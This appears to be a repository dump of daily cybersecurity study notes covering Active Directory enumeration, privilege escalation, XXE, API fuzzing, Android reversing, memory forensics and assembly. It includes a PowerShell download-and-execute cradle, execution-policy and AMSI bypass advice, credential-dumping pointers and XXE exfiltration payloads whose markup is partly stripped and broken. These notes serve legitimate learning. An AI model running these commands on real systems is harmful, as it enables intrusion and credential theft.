[https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt) -------------------------------------------------------------------------------- /Day 3 - Simple Domain Ennumeration in AD/README.md: -------------------------------------------------------------------------------- 1 | Some Basic Things to know : 2 | 3 | 1. If you hear AD don't think of it as a Domain, think of it as a forest as Microsoft considers that as a Security Boundary and normally if everything works as its intended if a person compromises a domain in a forest its ideally assumed that the other forests are also compromised. 4 | 2. DNS causes a lot of issues in AD. 5 | 3. Active Directory handles Accessibility, Manageability and Interoperability's of things inside a corporations. 6 | 7 | Now Cheat Sheets for PowerShell / PowerView AD Module. 8 | 9 | ```PowerShell 10 | # To get full help about a certain cmdlet 11 | Get-Help -Full 12 | # To get get examples of how to use the cmdlet 13 | Get-Help -Examples 14 | # To get all the cmdlets 15 | Get-Command -CommandType cmdlet 16 | # To bypass Execution Policy 17 | powershell -ExecutionPolicy bypass 18 | powershell -ep bypass 19 | # To Import a Module 20 | Import-Module 21 | # Download and execute stuff from Memory 22 | iex (New-Object Net.WebClient).DownloadString('https://url/payload') 23 | $wr = [System.Net.WebRequest]::Create("url") 24 | $r = $wr.GetResponse() 25 | ``` 26 | 27 | 28 | So most of the times when we wanna try to run stuff like powerview, and so on it wont really work for us due to AMSI. So we have to basically bypasss AMSI before executing our ennumeration tools/ scripts. 29 | 30 | After we have done that lets try to ennumerate with PowerView here is github repo to install it : 31 | 32 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 33 | 34 | and then we can just transfer this file to the Windows Machine and then open powershell bypass AMSI and then import PowerView.ps1 35 | 36 | Here is a Small Cheatsheet to Get Information via Powerview 37 | 38 | ```PowerShell 39 | # Get Domain Information 40 | Get-NetDomain 41 | Get-NetDomain -Domain ACME.Local #Get Info about a Particular Domain 42 | # To Get Domain Policies 43 | Get-DomainPolicy 44 | # To get users in the current domain 45 | Get-NetUser 46 | Get-NetUser -Filter Username # Get informaton about specific user 47 | # Get Properties of allusers in current domain 48 | Get-UserProperty 49 | # To Get Group in the Domain 50 | Get-NetGroup 51 | Get-NetGroup -Domain # To get group info about specific domain 52 | Get-NetGroup -FullData # To get all data about Groups 53 | Get-NetGroup *somethingyouwannasearch* # To get info about specific group name 54 | # List of Computers in current domain 55 | Get-NetComputer 56 | Get-NetComputer -FullData # Get all the data 57 | # Get Members of a Group 58 | Get-NetGroupMember -GroupName "NameofGroup" 59 | # Get Membership of a Group of a user 60 | Get-NetGroup -Username "username" 61 | # Get local groups on a machine 62 | Get-NetLocalGroup -ComputerName "computername" -ListGroups 63 | # Get Logged users on a computer 64 | Get-NetLoggedon -Computer 65 | # Shares on hosts 66 | Invoke-ShareFinder -Verbose 67 | #Find sensitive files on computers in the domain 68 | Invoke-FileFinder -Verbose 69 | # Get all fileservers of the domain 70 | Get-NetFileServer 71 | # List of GPO in this domain 72 | Get-NetGPO 73 | Get-NetGPO -Computer # For a specific computer 74 | Get-NetGPOGroup 75 | # Get OU's in a domain 76 | Get-NetOU -FullData 77 | # Get GPO's on a OU 78 | Get-NetGPO -GPOname "" 79 | # Get ACLs wiht an object 80 | Get-ObjectAcl -SamAccountName username/objectname -ResolveGUIDs 81 | # Get the ACLs associated with the specified LDAP path to be used for search 82 | Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN\=Users,DC=dollarcorp,DC\=moneycorp,DC\=local" -ResolveGUIDs Verbose 83 | # Searhc Intresting ACL 84 | Invoke-ACLScanner -ResolveGUIDs 85 | # Get All Domain Trusts 86 | Get-NetDomainTrust 87 | # Info about Forest 88 | Get-NetForest 89 | # All Domains in Forest 90 | Get-NetForestDomain 91 | Get-NetForestCatalog # GC for global catalogs 92 | ``` 93 | 94 | Methadology : 95 | Ennumerate Users, Computers, Domain Administrators, Eneterprise Admins, Shares and see if you can get any sensitvie information and then map the domain and draw it down and then map their trusts and then use ACL Scanners to see if you have any intresting ACLs that you can abuse. -------------------------------------------------------------------------------- /Day 4 - Lateral Movement and PrivEsc/README.md: -------------------------------------------------------------------------------- 1 | Somethings we should always check when we have some sort of intial access is always try to drop creds with Mimikatz for example or get the SAM/SYSTEM files to get credentials and try using them somewhere also we can utilize Powerview to basically ennumerate if we can move to some other machines with the current access we have : 2 | 3 | ```PowerShell 4 | #Machines in current domain where the current user has local admin access 5 | Find-LocalAdminAccess -Verbose 6 | # We can also use other tools like : 7 | Find-WMILocalAdminAccess.ps1 8 | # Find local admins on all machines 9 | Invoke-EnumerateLocalAdmin -Verbose 10 | # Check where the domain admin has sessions, confirm admin access 11 | Invoke-UserHunter -CheckAccess 12 | Invoke-UserHunter -Stealth # To do it stealthly 13 | 14 | ``` 15 | 16 | Which such techniques and this ennumeration we just did above we can try moving around the network also another great method in my opinion is to go for ennumeration via Bloodhound which presents all this information in one integrated view and you can do queries to find out stuff you can do like paths to admin and so on. 17 | 18 | This is a great room for learning more about how to use Bloodhound : https://tryhackme.com/room/postexploit 19 | 20 | And for getting Local Admin rights we can use a bunch of tehcniques like automated scirpts like Winpeas.exe and PowerUp. 21 | 22 | WinPeas.exe is a suite we can use to basically automate most of the local ennumerationn to find things we can abuse. 23 | PowerUp.ps1 is another great tool which can help us look/exploit Service Abuse, checking what we can do with a service and much more : https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc . 24 | 25 | We can also use other tools / features to abuse like lets say we have something like SMB or something we can use default creds, the username as the password or so on. 26 | P.S : Powersploit is a great tool in itself. 27 | 28 | We can use Powershell Remoting to move to machines inside the network via just powershell also tools like psexec and smbexec exist as well 29 | 30 | ```PowerShell 31 | # Create a Session with a specified Port 32 | New-PSSession -ComputerName Server01 -Port 8081 -UseSSL -ConfigurationName E12 33 | # Is something we can use to get an interactive session 34 | Enter-PSSession -ComputerName Server01 35 | ``` 36 | 37 | Also an amaazing resource of Powershell scripts is Nishang : https://github.com/samratashok/nishang 38 | 39 | There are scripts for : 40 | 1. Scanning 41 | 2. Bypassing Stuff 42 | 3. Escalataion 43 | 4. MITM 44 | 5. Pivotting 45 | 6. Shells 46 | 7. Escalation 47 | 8. and much more 48 | 49 | You can read the ReadMe.md file 50 | 51 | 52 | Another thing we should look for is 53 | ```cmd 54 | whoami /priv 55 | ``` 56 | 57 | and then https://www.jaacostan.com/2020/09/printspoofer-windows-privilege.html this article points out that if we have SeImpersonatePrivilege is enabled we can use PrintSpoofer.exe : https://github.com/itm4n/PrintSpoofer 58 | 59 | 60 | -------------------------------------------------------------------------------- /Day 5 - XML External Entity Injection/README.md: -------------------------------------------------------------------------------- 1 | ### XML External Entity Injection 2 | 3 | Resources used : https://portswigger.net/web-security/xxe 4 | 5 | XML : It stands for eXtensible Markup Language and is a markup language kind of like HTML, but this was mainly designed to store and transport data , this was desinged to be self-descriptive. 6 | 7 | Due to how this is we have attacks such as XML external entity injection which can lead to an attacker to intefere with an application's processing of XML data , and lead to file read in most cases. 8 | In some case to escalate an XXE attacks to compromise the underlying server , and perform an SSRF attack from this. 9 | 10 | We can use this to : 11 | 1. Retrieve Files 12 | 2. Perform SSRF Attacks 13 | 3. Exfiltragte data of bound 14 | 4. Blind XXE to retrieve data via error messages 15 | 16 | A great resource to learn from is this : https://www.youtube.com/watch?v=gjm6VHZa_8s&t 17 | 18 | Some snippets of XXE payloads from Payloads all the things : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection 19 | 20 | ```xml 21 | # If its visible and is parsed 22 | \]>&test; 23 | # XML to SSRF 24 | 25 | 27 | 28 | \]> 29 | &xxe; 30 | # Out of Band XXE 31 | 32 | 34 | 35 | 36 | \] 37 | > 38 | &callhome; 39 | 40 | # External DTD , PHP Filter 41 | 42 | 44 | 45 | %sp; 46 | %param1; 47 | \]> 48 | &exfil; 49 | 50 | File stored on http://127.0.0.1/dtd.xml 51 | 52 | "> 53 | ``` -------------------------------------------------------------------------------- /Day 6 - API Basic Techniques/README.md: -------------------------------------------------------------------------------- 1 | ### API Ennumeration and stuff 2 | 3 | Resources used : https://www.youtube.com/watch?v=yCUQBc2rY9Y, 4 | 5 | 6 | API : Application Programming Interface 7 | 8 | Used in Web and Mobile apps, and a lot of developers are lazy 9 | 10 | APIs kinda like this : 11 | ``` 12 | 13 | GET /apiendpoint/1 # Example of REST 14 | GET /apiendpoint?param=somevaluetoquery # This example of GraphQL 15 | 16 | ``` 17 | 18 | APIs often use JSON or XML , JSON is way more common types of APIs are SOAP,RESTful, GraphQL, etc. 19 | JSON : Is just a way to represent data in a text format, they start with curly braces and arrays in json start with [] and the json item starts with {}. 20 | 21 | Apps which might have API's : 22 | 1. Webapp which has mobile App 23 | 2. Apps with a lot of frontend complexity 24 | 3. Almost all mobile apps 25 | 4. Webpage taking long time to load 26 | 5. Webapp with dev documentation 27 | 28 | The two main ones are GraphQL and Restful 29 | 30 | RestFul : Are super easy to spot they use CRUD operations as their basis and are the most popular ones. 31 | **Try playing around with the Type of Request and possible endpoints all the time as if get exists maybe a delete or update exists as well** 32 | 33 | GRAPHQL : Difficult to spot , some examples could be like gql?q= , graphql?q= or g?q= , all the things are on one endpoint as its super easy to ennumerate and uses mutation, query and so on. 34 | 35 | 36 | 37 | Our main goal with most of the API ennumeration is to fuzz these endpoints on REST or Graphql apis which can lead to sensitive data disclosure also playing around with them and what type of request it is like POST,CREATE,UPDATE,DELETE and so on. 38 | 39 | 40 | 41 | And to do these Fuzzing and so on we can use tools like FFUF,WFUZZ and so on a quick cheat sheet on FFUF is here : 42 | ```bash 43 | ffuf -w /path/to/wordlist -u https://target/api/FUZZ # Fuzzing an API endpoint on website target 44 | 45 | # FFuf to ignore pages which give 401 error 46 | 47 | ffuf -w /path/to/values.txt -u https://target/script.php?valid_name=FUZZ -fc 401 48 | 49 | # Fuzz Post Request Data 50 | ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401 51 | 52 | ``` 53 | 54 | Link to FFUF : https://github.com/ffuf/ffuf and its documentation. 55 | 56 | Here is the Link to WFUZZ : https://github.com/xmendez/wfuzz 57 | 58 | Here is a Link to another tool called Arjun we can use HTTP parameters with a huge list default dictionary, so it basically tests and plays around with diffrent params. 59 | 60 | Link to Arjun : https://github.com/s0md3v/Arjun -------------------------------------------------------------------------------- /Day 7 - Android Hacking Basic Techniques/README.md: -------------------------------------------------------------------------------- 1 | ### Android Hacking 101 2 | 3 | Resources Used : https://tryhackme.com/room/androidhacking101 4 | 5 | There are two types of Apps : Native and Hybrid Apps. 6 | 7 | Native : Made for Mobile OS specifically, Android uses Java or Kotlin and IOS uses Swift or Objective-C. 8 | 9 | Hybrid : These are made using Hybrid Frameworks like Flutter, React Native and so on. 10 | 11 | As we are talking about mainly android hacking here if you create a android apk file it contain a .dex file, which contains binary Dalvik bytecode, and this contain Smali which is an assembly language that runs on Dalvik VM. 12 | 13 | Smali Types : 14 | v : void 15 | z : boolean 16 | B : byte 17 | S : short 18 | C : char 19 | F : float 20 | I : int 21 | J : long 22 | D : double 23 | [ : array 24 | 25 | Smali Registers by JesusFreke : 26 | 27 | In dalvik's bytecode, registers are always 32 bits, and can hold any type of value. 2 registers are used to hold 64 bit types (Long and Double). 28 | 29 | Two ways to spefiy how many registers are available in a method, .registers directive specifies the total number of registers in the method. and .locals directive specifies the number of non-parameter registers in the method. 30 | 31 | When a method i called the parameters are place on the last n registers, for ex. if 2 arguements are passed and it has 5 registers (v0 - v4) the params would be placed in v3,v4. 32 | 33 | Lets try to find a tool to first help us emulate stuff as well with android apps its a good call to find an appliation to emulate those apps on our computer. 34 | 35 | https://www.genymotion.com/ : For Linux 36 | https://www.bignox.com/ : For Windows and Mac 37 | 38 | Information Gathering -> Reversing -> Static Analysis -> Dynamic Analysis -> Report 39 | 40 | To get some information we can search the app on playstore, and we can see the id of the package when we click on the app we search adn opened. 41 | 42 | Now to debug these Apk's for them first we need to download the apk's for this we use a tool called **Android Debug Bridge (ADB)**. 43 | 44 | How to extract the apk , For this we can use jadx suite to load a simple APK and look at its Java Code and jadx also has a gui version 45 | 46 | ```bash 47 | jadx -d [path-output-folder] [path-apk-or-dex-file] 48 | ``` 49 | 50 | We can also use this tool called Dex2Jar which converts apk to jar and then we inspect the Jar file in JD-GUI : http://java-decompiler.github.io/ 51 | ```bash 52 | d2j-dex2jar.sh /path/application.apk 53 | ``` 54 | 55 | Another tool to see the source code in smali is apktool 56 | 57 | ``` 58 | apktool d app.apk 59 | ``` -------------------------------------------------------------------------------- /Day 8 - Voltatlity Forensics/README.md: -------------------------------------------------------------------------------- 1 | ### Volatility 2 | 3 | Resources used : https://tryhackme.com/room/bpvolatility 4 | 5 | Volatility is a free memory forensics tool developed and maintained by Volatility labs. Regarded as the gold standard for memory forensics in incident response, Volatility is wildly expandable via a plugins system and is an invaluable tool for any Blue Teamer. 6 | 7 | Obtaining a memory capture from machines can be done in numerous ways, however, the easiest method will often vary depending on what you're working with. For example, live machines (turned on) can have their memory captured with one of the following tools: 8 | 9 | FTK Imager - Link Redline - Link \*Requires registration but Redline has a very nice GUI DumpIt.exe win32dd.exe / win64dd.exe - \*Has fantastic psexec support, great for IT departments if your EDR solution doesn't support this 10 | 11 | These tools will typically output a .raw file which contains an image of the system memory. The .raw format is one of the most common memory file types you will see in the wild. 12 | 13 | Offline machines, however, can have their memory pulled relatively easily as long as their drives aren't encrypted. For Windows systems, this can be done via pulling the following file: 14 | 15 | %SystemDrive%/hiberfil.sys 16 | 17 | hiberfil.sys, better known as the Windows hibernation file contains a compressed memory image from the previous boot. Microsoft Windows systems use this in order to provide faster boot-up times, however, we can use this file in our case for some memory forensics! 18 | 19 | Things get even more exciting when we start to talk about virtual machines and memory captures. Here's a quick sampling of the memory capture process/file containing a memory image for different virtual machine hypervisors: 20 | 21 | ``` 22 | VMware - .vmem file 23 | Hyper-V - .bin file 24 | Parallels - .mem file 25 | VirtualBox - .sav file *This is only a partial memory file. You'll need to dump memory like a normal bare-metal system for this hypervisor 26 | ``` 27 | 28 | Now that we've collected our memory image let's dig into it!First, let's figure out what profile we need to use. Profiles determine how Volatility treats our memory image since every version of Windows is a little bit different. Let's see our options now with the command 29 | 30 | ```bash 31 | volatility -f MEMORY_FILE.raw imageinfo 32 | ``` 33 | 34 | In addition to viewing active processes, we can also view active network connections at the time of image creation! Let's do this now with the command 35 | 36 | ```bash 37 | volatility -f MEMORY_FILE.raw --profile=PROFILE netscan. 38 | ``` 39 | 40 | Unfortunately, something not great is going to happen here due to the sheer age of the target operating system as the command netscan doesn't support it. It's fairly common for malware to attempt to hide itself and the process associated with it. That being said, we can view intentionally hidden processes via the command `psxview` 41 | 42 | In addition to viewing hidden processes via psxview, we can also check this with a greater focus via the command 'ldrmodules'. Three columns will appear here in the middle, InLoad, InInit, InMem. If any of these are false, that module has likely been injected which is a really bad thing. On a normal system the grep statement above should return no output. 43 | 44 | Processes aren't the only area we're concerned with when we're examining a machine. Using the 'apihooks' command we can view unexpected patches in the standard system DLLs. If we see an instance where Hooking module: that's really bad. Injected code can be a huge issue and is highly indicative of very very bad things. We can check for this with the command `malfind`. Using the full command 45 | 46 | 47 | ``` 48 | volatility -f MEMORY_FILE.raw --profile=PROFILE malfind -D 49 | ``` 50 | we can not only find this code, but also dump it to our specified directory. 51 | 52 | Last but certainly not least we can view all of the DLLs loaded into memory. DLLs are shared system libraries utilized in system processes. These are commonly subjected to hijacking and other side-loading attacks, making them a key target for forensics.For this we use the command dlllist 53 | -------------------------------------------------------------------------------- /Day 9 - Assembly Language Basics/README.md: -------------------------------------------------------------------------------- 1 | ### Introduction to Assembly x86-64 2 | 3 | Resource Used : https://tryhackme.com/room/introtox8664 4 | Since the architecture is x86-64, the registers are 64 bit and Intel has a list of 16 registers: 5 | 6 | In 64bit architecture the registers start from r and in the 32 bit the registers start from 32 bit refer to the THM room for the registers list. 7 | 8 | They can hold upto 64 bits of data, other parts of the register can also be referenced.registers can also be referenced as 32 bit values as shownThe %rsp is the stack pointer and it points to the top of the stack which contains the most recent memory address. The stack is a data structure that manages memory for programs. 9 | 10 | - `leaq source, destination`: this instruction sets destination to the address denoted by the expression in source 11 | 12 | - `addq source, destination`: destination = destination + source 13 | 14 | - `subq source, destination`: destination = destination - source 15 | 16 | - `imulq _source, destination_`: destination = destination \* source 17 | 18 | - `salq source, destination`: destination = destination << source where << is the left bit shifting operator 19 | 20 | - `sarq source, destination`: destination = destination >> source where >> is the right bit shifting operator 21 | 22 | - `xorq source, destination`: destination = destination XOR source 23 | 24 | - `andq source, destination`: destination = destination & source 25 | 26 | - `orq source, destination`: destination = destination | source 27 | 28 | 29 | If statements use 3 important instructions in assembly: 30 | 31 | - `cmpq source2, source1`_:_ it is like computing a-b without setting destination 32 | 33 | - `testq source2, source1`: it is like computing a&b without setting destination 34 | 35 | jmp: unconditional 36 | je : equal/zero 37 | jne : not equal/ not zero 38 | js : negative 39 | jns : nonnegative 40 | jg : greater 41 | jge : greate or equal 42 | jl;: less 43 | jle : less or equal 44 | ja : above (unsigned) 45 | jb : below (unsigned) 46 | 47 | --underwork--- -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Cyber Security Knowledge 2 | 3 | A Project where i try to learn something new every 2 days, 1 day for learning and the next day for applying the knowledge and this is a place to track it. 4 | 5 | The Idea is to learn a new thing and then apply it, by Investing on Day 1 some time to research about the subject and then on Day 2 apply that knowledge onto a platform so for example doing a HTB Challenge, or do a Port Swigger Academy lab etc. 6 | 7 | This challenge was inspired from a challenge I found on LinkedIn : https://github.com/harsh-bothra/learn365 8 | 9 | **This Challenge is mostly about learning so notes here not all made by knowledge, i use a lot of resources and try to link them, if there are any resources not mentioned please feel free to message me and i will add them** 10 | 11 | **Going continue the challenge again after a bit of a break but still, also i saw that most of the categories have weak information atleast till day 28 so will be revamping and adding more information to them later as well** 12 | 13 | Day 1 : Basic of Linux Stack Smashing/ Buffer Overflows / Intro to GDB 14 | 15 | Day 2 : Practice on HTB 16 | 17 | Day 3: Basic AD Enumeration via Power View and using The AD Module 18 | 19 | Day 4 : Privilege Escalation on a basic Level in AD environments 20 | 21 | Day 5 : XML External Entity Injection Attacks 22 | 23 | Dat 6 : API endpoint Basic Ennumeration 24 | 25 | Day 7 : Android Hacking Basic Tools 26 | 27 | Day 8 : Voltality Forensics 28 | 29 | Day 9 : Assembly Language Basics 30 | 31 | Day 10 : Report Writing 32 | 33 | Day 11 : Sysinternals 34 | 35 | Day 12 : Core Windows Processes 36 | 37 | Day 13 : Event Logs 38 | 39 | Day 14 : Yara 40 | 41 | Day 15 : ROP Based Buffer Overflows (Basics) 42 | 43 | Day 16 : OAuth Basics 44 | 45 | Day 17-19 : Naham Con 46 | 47 | Day 20 : File Transfers 48 | 49 | Day 21 : Pwntools Usage Basics 50 | 51 | Day 22 : GraphQL Basics 52 | 53 | Break : HTB BattleGrounds Tournament and Univesity Studies 54 | 55 | Day 23 : Bash Scripting and Linux commands 56 | 57 | Day 24 : Powershell Basics 58 | 59 | Break. 60 | 61 | Day 25 : x64 Basic Linux Buffer Overflows (No Protections) 62 | 63 | Day 26: .NET Executing Reversing 64 | 65 | 66 | --------------------------------------------------------------------------------